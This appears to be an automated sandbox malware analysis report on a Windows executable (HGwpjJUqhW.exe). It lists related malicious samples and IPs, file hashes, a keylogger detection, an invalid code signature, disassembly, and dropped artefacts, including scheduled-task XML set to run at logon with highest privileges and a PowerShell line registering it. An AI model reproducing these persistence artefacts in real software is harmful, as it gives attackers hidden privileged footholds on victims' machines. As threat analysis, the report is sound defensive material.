                                                                                                                          armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 47.78.183.235
                                                                                                                          armv5l.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 49.227.11.95
                                                                                                                          nklsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 121.74.237.200
                                                                                                                          sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                          • 121.75.40.91
                                                                                                                          arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 47.78.236.95
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          37f463bf4616ecd445d4a1937da06e19http://www.cipassoitalia.it/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                          • 47.79.48.211
                                                                                                                          nv8401986_110422.exeGet hashmaliciousQjwmonkeyBrowse
                                                                                                                          • 47.79.48.211
                                                                                                                          adguardInstaller.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 47.79.48.211
                                                                                                                          adguardInstaller.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                          • 47.79.48.211
                                                                                                                          RisingStrip.exeGet hashmaliciousVidarBrowse
                                                                                                                          • 47.79.48.211
                                                                                                                          adguardVPNInstaller.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 47.79.48.211
                                                                                                                          ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                          • 47.79.48.211
                                                                                                                          Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                          • 47.79.48.211
                                                                                                                          Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
                                                                                                                          • 47.79.48.211
                                                                                                                          No context
                                                                                                                          Process:C:\Users\user\Desktop\HGwpjJUqhW.exe
                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7460336
                                                                                                                          Entropy (8bit):6.57889960952563
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:196608:drEqXU8HMTs3juh96tfMcQPlQ+02cju5ehsV6ytfueau:7XU8YVVVuS
                                                                                                                          MD5:9DEE6F9C41488F78CC867C028EA58199
                                                                                                                          SHA1:A3D7F0D74AC5256FA04D529A754F01A4178161F3
                                                                                                                          SHA-256:B96B4DAA7ED00F2F5F54890988BB07AFC5B7DA9481B068CF8CC2CD2D91A7D54E
                                                                                                                          SHA-512:5D3F4303CB54A07335D6EE3FE80C8C7808811B90C7B9C5A91CCDCE13BA4D80D793F0F23750EE75B16B78A288CCAA19328B7ADBB785BF7ADE2900ADA68C039C68
                                                                                                                          Malicious:false
                                                                                                                          Preview:MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$.........ydL..7L..7L..7X..6X..7X..6...7...6_..7...6F..7...68..7*..7F..7X..6O..7X..6e..7X..6N..7L..7]..7..6...7...6E..7...6n..7...6M..7...6?..7...6w..7X..6a..7L..7...7...6...7...6M..7...7M..7L..7M..7...6M..7RichL..7........................PE..d.....Gg.........."......$<...5.......6........@.............................Pr......$r...`.........................................@@M.@....JM.......T.......Q.......q..U....q.......H.T.....................H.(.....H.8............@<..............................text...\"<......$<................. ..`.rdata...O...@<..P...(<.............@..@.data....Q....M......xM.............@....pdata........Q......^Q.............@..@_RDATA........T.......S.............@..@.QMGuid. .....T.......S.............@....rsrc.........T.......S.............@..@.reloc........q.......p.............@..B........................................................
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):64
                                                                                                                          Entropy (8bit):1.1510207563435464
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:NlllulfkT/Z:NllUMT
                                                                                                                          MD5:D4FA57E524AF6F31660A084960CF6589
                                                                                                                          SHA1:28936BB37DAA2328742AA1B48F0DB33565DB5A07
                                                                                                                          SHA-256:6C8D419DBFA43F3540145F767A34D6F90487339EA5B5E150A6BA771EBA0593D4
                                                                                                                          SHA-512:2A35319EFC241394638E7BE9E1BE44FCB5F2F51F1FA21A5E3F80FC61B989B4D1C5E2A64959D799E9ACB453936CF9028FC2DB64357B1BEE9DB1F0822CE8FEE432
                                                                                                                          Malicious:false
                                                                                                                          Preview:@...e................................................@..........
                                                                                                                          Process:C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe
                                                                                                                          File Type:XML 1.0 document, ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1893
                                                                                                                          Entropy (8bit):5.212287775015203
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
                                                                                                                          MD5:E3FB2ECD2AD10C30913339D97E0E9042
                                                                                                                          SHA1:A004CE2B3D398312B80E2955E76BDA69EF9B7203
                                                                                                                          SHA-256:1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
                                                                                                                          SHA-512:9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm
                                                                                                                          Process:C:\Users\user\Desktop\HGwpjJUqhW.exe
                                                                                                                          File Type:XML 1.0 document, ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1743
                                                                                                                          Entropy (8bit):5.172564010951281
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:ck5XzDlybXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:75XzDlybGQhFdOFQOzBdKrKsTLXbV
                                                                                                                          MD5:A16DD00D191DC2FC881634D7DEE2026C
                                                                                                                          SHA1:53A373DC6DA7CA186695CCCB9BF3CFC205C45C58
                                                                                                                          SHA-256:27CD089F35A3AB92614414C0788900BC64C637B2FC011858932F335C88FEF23D
                                                                                                                          SHA-512:F430EB5753C428D3473485217865F9BC8C16804C211A2788E3B90D6F9CE499BF0842EB35A4519AD5223741348E4AB47F80A4F13004D5EE9B2CD0322B75E82264
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.6" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\.Net OneStart</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers />. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>.
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Users\user\Desktop\HGwpjJUqhW.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):151
                                                                                                                          Entropy (8bit):4.741657013789009
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                                                                          MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                                                                          SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                                                                          SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                                                                          SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                                                                          Malicious:false
                                                                                                                          Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName
                                                                                                                          Process:C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):151
                                                                                                                          Entropy (8bit):4.741657013789009
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                                                                          MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                                                                          SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                                                                          SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                                                                          SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                                                                          Malicious:false
                                                                                                                          Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName
                                                                                                                          Process:C:\Users\user\Desktop\HGwpjJUqhW.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5289240
                                                                                                                          Entropy (8bit):7.236584667855755
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:GgF0pT9HlrxRVwJMACNiREvBvlvwvCvxvq:pK9HhxRVwJMAqoetRqA9q
                                                                                                                          MD5:C4503D77F7A1BD9AD2B198D01E69BC43
                                                                                                                          SHA1:FBFE0B4981D65EE16D16FCFF20B168F6C374C07F
                                                                                                                          SHA-256:E60B3FE4E29A9EA4BA95FC3D951D63E90ADC05B2A362234669BBD56292197547
                                                                                                                          SHA-512:FC5FB7CEA99E9BE9659C81B70D9D2361553288AE81C32C476091DB18D92E326091289224C4561E8A272F6B0F90889C1687B8F99EF68314EBFCE81FC6176BD3E3
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe, Author: Joe Security
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....R.d..................-...".....D.-.......-...@...........................Q......BQ..........@............................/..?....2.`.............P..)..../.............................../....................../..............................text.....-.......-................. ..`.itext..P.....-.......-............. ..`.data...x.....-.......-.............@....bss.....................................idata...?..../..@..................@....tls........../..........................rdata......../.....................@..@.reloc......../......./.............@..B.rsrc...`.....2.......1.............@..@..............Q.......P.............@..@................................................................................................
                                                                                                                          Process:C:\Users\user\Desktop\HGwpjJUqhW.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):26
                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                          Malicious:true
                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                          Process:C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3414
                                                                                                                          Entropy (8bit):5.494882031884119
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:L3yfkSafIfkNyy3kRafI3k0rfI3k0rfI3k02:WfkSTfkNt3kRT3k0E3k0E3k02
                                                                                                                          MD5:884487928C323259F886FED54D40D966
                                                                                                                          SHA1:59C5498F09813D301A3781D413042D87E13C2637
                                                                                                                          SHA-256:8E6DA6E51B41483060E3B1F17020D058642390DCA0778F1232C8D498E598F5AF
                                                                                                                          SHA-512:17924F950F36C65D7D69EC5A860B9689A77BBF1D21CA2E87AE53731FE9E0DB6C7EAFDB2D56B22B9AF99B89022A22AAB528D1C387DF9227552E6EAA0B3166107A
                                                                                                                          Malicious:false
                                                                                                                          Preview:----------Raised Exception--------------03/01/2025 23:38:19.863----------------..Exception PID=7652 TID=7656 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:48CB03,9FE6A,F3E,664F78,D97AE,C1A6,74DEFA27,6EF7B5C,29)......----------Exception---------------------03/01/2025 23:38:19.863----------------..Exception Code=0x0EEDFADE Flags=0x1 Addr=0x7500CC12 PID=7652 TID=7656 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:7500CC12,0048CB03*2,9FE6A,F3E,664F78,D97AE,C1A6,74DEFA27,6EF7B5C,29)....----------Raised Exception--------------03/01/2025 23:38:19.863----------------..Exception PID=7652 TID=7656 [Main Thread] Build=5157....Failed to access Agent registry settings, while trying to open "SOFTWARE\Xoreax\Incredibuild" ke
                                                                                                                          Process:C:\Users\user\Desktop\HGwpjJUqhW.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3386
                                                                                                                          Entropy (8bit):5.497766602900512
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:L3N7fkSaCWjfkNyN73kPaCWj3ksrCWj3ksrCWj3ks2:tfkSQfkNK3kPQ3ksD3ksD3ks2
                                                                                                                          MD5:0457EFB96FA0F25B63484220A1638C1D
                                                                                                                          SHA1:D82035F4F49E2E85BD2C388C364EAD96C1F1D57F
                                                                                                                          SHA-256:11E9766889F0E2066B0A8397073811A0D3353A254F74A77E8EE2F962970F4635
                                                                                                                          SHA-512:AB11DF41941672A85175DCF0E7082979F3292DB74311FF48BEFFBA1DE3498D310123258BB564F69C114E87F700EA6FB23CCB3E26C442F90D2EFAC9399FD7A051
                                                                                                                          Malicious:false
                                                                                                                          Preview:----------Raised Exception--------------03/01/2025 23:38:14.160----------------..Exception PID=7344 TID=7348 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:48CB03,9FE6A,F3E,664F78,D97AE,C1A6,74DEFA27,6EF7B5C,29)......----------Exception---------------------03/01/2025 23:38:14.160----------------..Exception Code=0x0EEDFADE Flags=0x1 Addr=0x7500CC12 PID=7344 TID=7348 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:7500CC12,0048CB03*2,9FE6A,F3E,664F78,D97AE,C1A6,74DEFA27,6EF7B5C,29)....----------Raised Exception--------------03/01/2025 23:38:14.160----------------..Exception PID=7344 TID=7348 [Main Thread] Build=5157....Failed to access Agent registry settings, while trying to open "SOFTWARE\Xoreax\Incredibuild" ke
                                                                                                                          Process:C:\Users\user\Desktop\HGwpjJUqhW.exe
                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):7460336
                                                                                                                          Entropy (8bit):6.57889960952563
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:196608:drEqXU8HMTs3juh96tfMcQPlQ+02cju5ehsV6ytfueau:7XU8YVVVuS
                                                                                                                          MD5:9DEE6F9C41488F78CC867C028EA58199
                                                                                                                          SHA1:A3D7F0D74AC5256FA04D529A754F01A4178161F3
                                                                                                                          SHA-256:B96B4DAA7ED00F2F5F54890988BB07AFC5B7DA9481B068CF8CC2CD2D91A7D54E
                                                                                                                          SHA-512:5D3F4303CB54A07335D6EE3FE80C8C7808811B90C7B9C5A91CCDCE13BA4D80D793F0F23750EE75B16B78A288CCAA19328B7ADBB785BF7ADE2900ADA68C039C68
                                                                                                                          Malicious:false
                                                                                                                          Preview:MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$.........ydL..7L..7L..7X..6X..7X..6...7...6_..7...6F..7...68..7*..7F..7X..6O..7X..6e..7X..6N..7L..7]..7..6...7...6E..7...6n..7...6M..7...6?..7...6w..7X..6a..7L..7...7...6...7...6M..7...7M..7L..7M..7...6M..7RichL..7........................PE..d.....Gg.........."......$<...5.......6........@.............................Pr......$r...`.........................................@@M.@....JM.......T.......Q.......q..U....q.......H.T.....................H.(.....H.8............@<..............................text...\"<......$<................. ..`.rdata...O...@<..P...(<.............@..@.data....Q....M......xM.............@....pdata........Q......^Q.............@..@_RDATA........T.......S.............@..@.QMGuid. .....T.......S.............@....rsrc.........T.......S.............@..@.reloc........q.......p.............@..B........................................................
                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Entropy (8bit):7.236584667855755
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 98.44%
                                                                                                                          • Inno Setup installer (109748/4) 1.08%
                                                                                                                          • InstallShield setup (43055/19) 0.42%
                                                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                          File name:HGwpjJUqhW.exe
                                                                                                                          File size:5'289'240 bytes
                                                                                                                          MD5:c4503d77f7a1bd9ad2b198d01e69bc43
                                                                                                                          SHA1:fbfe0b4981d65ee16d16fcff20b168f6c374c07f
                                                                                                                          SHA256:e60b3fe4e29a9ea4ba95fc3d951d63e90adc05b2a362234669bbd56292197547
                                                                                                                          SHA512:fc5fb7cea99e9be9659c81b70d9d2361553288ae81c32c476091db18d92e326091289224c4561e8a272f6b0f90889c1687b8f99ef68314ebfce81fc6176bd3e3
                                                                                                                          SSDEEP:98304:GgF0pT9HlrxRVwJMACNiREvBvlvwvCvxvq:pK9HhxRVwJMAqoetRqA9q
                                                                                                                          TLSH:F836CFA0B642C822C1631678DD1B97F5B975BF315F641893BAF53E0C3E3E5623828297
                                                                                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                          Icon Hash:dd9d5b5252b5b513
                                                                                                                          Entrypoint:0x6dc144
                                                                                                                          Entrypoint Section:.itext
                                                                                                                          Digitally signed:true
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                          DLL Characteristics:
                                                                                                                          Time Stamp:0x64C252F8 [Thu Jul 27 11:20:24 2023 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:4
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:4
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:4
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:07af52ac52c26a20d4efc068ff8bb754
                                                                                                                          Signature Valid:false
                                                                                                                          Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                          Error Number:-2146869232
                                                                                                                          Not Before, Not After
                                                                                                                          • 18/07/2022 01:00:00 18/07/2024 00:59:59
                                                                                                                          Subject Chain
                                                                                                                          • CN=Incredibuild Software Ltd., O=Incredibuild Software Ltd., S=Tel Aviv, C=IL
                                                                                                                          Version:3
                                                                                                                          Thumbprint MD5:8164525B12F9B6829CCD5054865F2D41
                                                                                                                          Thumbprint SHA-1:583F01EE72450A9945FB1CFA539BAAB983D3F1D9
                                                                                                                          Thumbprint SHA-256:2EBD549CFBD28201F8773F370E920A21BB010F577BA74B4726332D2CE7836F69
                                                                                                                          Serial:7098774ED29B0565AB114EF2F2871CF7
                                                                                                                          Instruction
                                                                                                                          push ebp
                                                                                                                          mov ebp, esp
                                                                                                                          add esp, FFFFFFF0h
                                                                                                                          mov eax, 006D9A34h
                                                                                                                          call 00007FBF58BB8009h
                                                                                                                          call 00007FBF58E89730h
                                                                                                                          mov edx, 006F8295h
                                                                                                                          mov eax, 006F8294h
                                                                                                                          call 00007FBF58E89769h
                                                                                                                          movzx edx, byte ptr [006F8295h]
                                                                                                                          movzx eax, byte ptr [006F8294h]
                                                                                                                          call 00007FBF58E89C86h
                                                                                                                          mov eax, dword ptr [006EDC88h]
                                                                                                                          movzx eax, byte ptr [eax]
                                                                                                                          sub al, 01h
                                                                                                                          jc 00007FBF58E8C751h
                                                                                                                          je 00007FBF58E8C75Bh
                                                                                                                          dec al
                                                                                                                          je 00007FBF58E8C76Ah
                                                                                                                          dec al
                                                                                                                          jne 00007FBF58E8C770h
                                                                                                                          call 00007FBF58E83993h
                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                          xor ecx, ecx
                                                                                                                          mov dl, 01h
                                                                                                                          call 00007FBF58E83D6Ch
                                                                                                                          jmp 00007FBF58E8C7C0h
                                                                                                                          call 00007FBF58E89CEEh
                                                                                                                          mov byte ptr [006F8294h], al
                                                                                                                          jmp 00007FBF58E8C74Fh
                                                                                                                          movzx eax, byte ptr [006F8295h]
                                                                                                                          call 00007FBF58E89E37h
                                                                                                                          mov byte ptr [006F8294h], al
                                                                                                                          jmp 00007FBF58E8C73Ch
                                                                                                                          call 00007FBF58E89F73h
                                                                                                                          mov byte ptr [006F8294h], al
                                                                                                                          cmp byte ptr [006F8294h], 00000000h
                                                                                                                          jne 00007FBF58E8C78Bh
